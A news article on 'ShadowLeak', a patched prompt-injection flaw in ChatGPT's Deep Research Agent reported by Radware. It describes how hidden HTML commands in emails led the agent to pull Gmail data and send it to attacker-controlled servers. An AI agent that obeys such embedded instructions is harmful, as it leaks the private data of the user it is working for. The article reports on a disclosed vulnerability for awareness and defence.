ChatGPT Vulnerability Allowed Email-Based Data Leaks

Security researchers discovered ChatGPT vulnerability allowing hidden email commands to manipulate AI and leak sensitive data from connected services like Gmail, since patched by OpenAI.

AI Security Breach: ChatGPT Manipulated Through Hidden Email Commands

Security researchers have uncovered a critical vulnerability in OpenAI's ChatGPT that allowed attackers to manipulate the AI chatbot through seemingly innocent emails, potentially leading to sensitive data leaks from connected services like Gmail.

The ShadowLeak Attack Method

Dubbed "ShadowLeak" by researchers at cybersecurity firm Radware, this sophisticated attack exploited ChatGPT's Deep Research Agent feature. The vulnerability, which has since been patched by OpenAI, involved embedding hidden commands within the HTML code of emails that appeared harmless to human recipients but were executable by ChatGPT.

When users connected ChatGPT to their Gmail accounts and instructed the AI to analyze their emails, the hidden prompts would trigger automatically. "This represents a new frontier in AI security threats where the attack surface extends beyond traditional endpoints," explained a Radware spokesperson.

How the Exploit Worked

The attack chain began with cybercriminals sending specially crafted emails to potential victims. These emails contained malicious HTML code invisible to users but detectable by ChatGPT when processing email content. Once triggered, the hidden commands could instruct ChatGPT to extract sensitive information from the victim's Gmail account and transmit it to external servers controlled by attackers.

What made this vulnerability particularly dangerous was its cloud-based nature. Unlike traditional attacks that target user devices, ShadowLeak operated entirely within ChatGPT's cloud environment, bypassing conventional security measures. The attack demonstrated how AI systems can be manipulated through indirect channels that traditional security protocols might not monitor effectively.

Broader Implications for AI Security

While the demonstration focused on Gmail, researchers confirmed that similar vulnerabilities could affect other services integrated with ChatGPT's Deep Research Agent, including Outlook, Dropbox, Google Drive, and SharePoint. The discovery highlights the growing security challenges as AI systems become more deeply integrated with personal and enterprise data sources.

OpenAI responded promptly to the disclosure, implementing fixes that prevent such manipulation attempts. However, the incident serves as a stark reminder of the evolving threat landscape in the age of artificial intelligence. As AI systems handle increasingly sensitive tasks, ensuring their security against sophisticated manipulation techniques becomes paramount.

Security experts recommend that users remain cautious when connecting AI assistants to sensitive accounts and regularly review connected applications and permissions. The incident underscores the need for ongoing security research and proactive vulnerability management in AI systems.

Sebastian Ivanov

Sebastian Ivanov is a leading expert in technology regulations from Bulgaria, advocating for balanced digital policies that protect users while fostering innovation.

Read full bio →